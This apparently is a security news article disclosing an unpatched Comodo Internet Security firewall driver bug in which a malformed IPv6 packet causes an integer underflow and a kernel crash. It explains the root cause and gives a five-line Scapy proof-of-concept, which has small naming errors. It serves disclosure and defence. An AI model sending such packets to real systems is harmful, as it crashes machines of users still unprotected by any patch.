Critical Comodo Internet Security 0-Day Cras Vulnerability Lets

An unpatched zero-day vulnerability in Comodo Internet Security’s firewall driver, Inspect.sys, has been publicly disclosed after researchers received no response from the vendor following multiple disclosure attempts. This critical flaw, which remains unaddressed, reportedly allows attackers to achieve significant system compromise, posing a serious risk to users.

The vulnerability, dubbed ComoDoS, uncovered by Marcus Hutchins, allows a remote attacker to crash a target Windows system with a single malformed IPv6 packet, bypassing all configured firewall rules in the process.

At the time of publication, no patch exists. Marcus Hutchins submitted a full root-cause analysis, patch suggestions, and a proof-of-concept (PoC) to Comodo’s security team but received zero acknowledgment.

Comodo Internet Security 0-Day Vulnerability

The flaw resides in Inspect.sys’s IPv6 header parser. IPv6 packets support optional “extension headers” that chain between the fixed 40-byte IPv6 header and the upper-layer protocol (TCP, UDP, etc.).

The parser iterates through these extension headers, subtracting each header’s length from a payload_length variable derived directly from the attacker-controlled IPv6 fixed header.

The critical issue: the code never validates the payload length field. If an attacker sets the IPv6 payload length to a value smaller than the total extension header lengths, the unsigned 64-bit payload_length variable underflows and wraps around to approximately 18.4 quintillion (0xFFFFFFFFFFFFFFF8).

Because the firewall driver must parse TCP/IP headers before enforcing any firewall rules, this parsing occurs regardless of whether every port is blocked.

The resulting integer underflow triggers a kernel crash (BSOD), making it a reliable remote denial-of-service primitive. The PoC exploit is remarkably compact, fitting in four lines of Python using Scapy:

pythonext = IPv6ExtHdrDestOpt(nh=6, options=[PadN(optdata=b"x00" * 8)])
tcp = TCP(sport=1337, dport=80, flags="S", seq=0, ack=1, window=0x2000)
ipv6 = IPv6(dst=dst_ip, nh=60, hlim=64, plen=8)
pkt = ipv6 / ext / tcp
send(packet)

Marcus Hutchins deliberately used the Destination Options extension header (type 60) because it is subject to the least router-level filtering, maximizing the likelihood that the malicious packet reaches its target across the internet.

Beyond the DoS primitive, Marcus Hutchins identified reachable out-of-bounds (OOB) read and write paths triggered by the same underflowed value. However, both primitives face significant exploitation constraints.

The OOB-read occurs inside a WebDAV/HTTP artifact scanner, where the size value is truncated to 16-bit, capping it at 65 KB. A page fault in this path crashes the system at DISPATCH_LEVEL.

The OOB-write, reached only after a full TCP handshake, truncates the underflowed size to 32-bit, producing a 4 GB kernel pool overflow that is virtually guaranteed to crash the system. Since standard network packets max out at 65 KB, there is no realistic way to shrink the overflow enough to prevent a crash, making remote code execution (RCE) highly unlikely at this time.

The vulnerability was discovered during research into BYOVD (Bring Your Own Vulnerable Driver) attack surfaces using an AI-assisted analysis pipeline.

While auditing Comodo’s older driver version, Marcus Hutchins identified architectural weaknesses that motivated manual analysis of the current driver, leading directly to this finding.

A full PoC is publicly available on GitHub. Organizations relying on Comodo Internet Security should monitor for anomalous IPv6 traffic and consider network-level controls blocking malformed IPv6 extension headers as a temporary mitigation until an official patch is released.

Disclaimer: HackersRadar reports on cybersecurity threats and incidents for informational and awareness purposes only. We do not engage in hacking activities, data exfiltration, or the hosting or distribution of stolen or leaked information. All content is based on publicly available sources.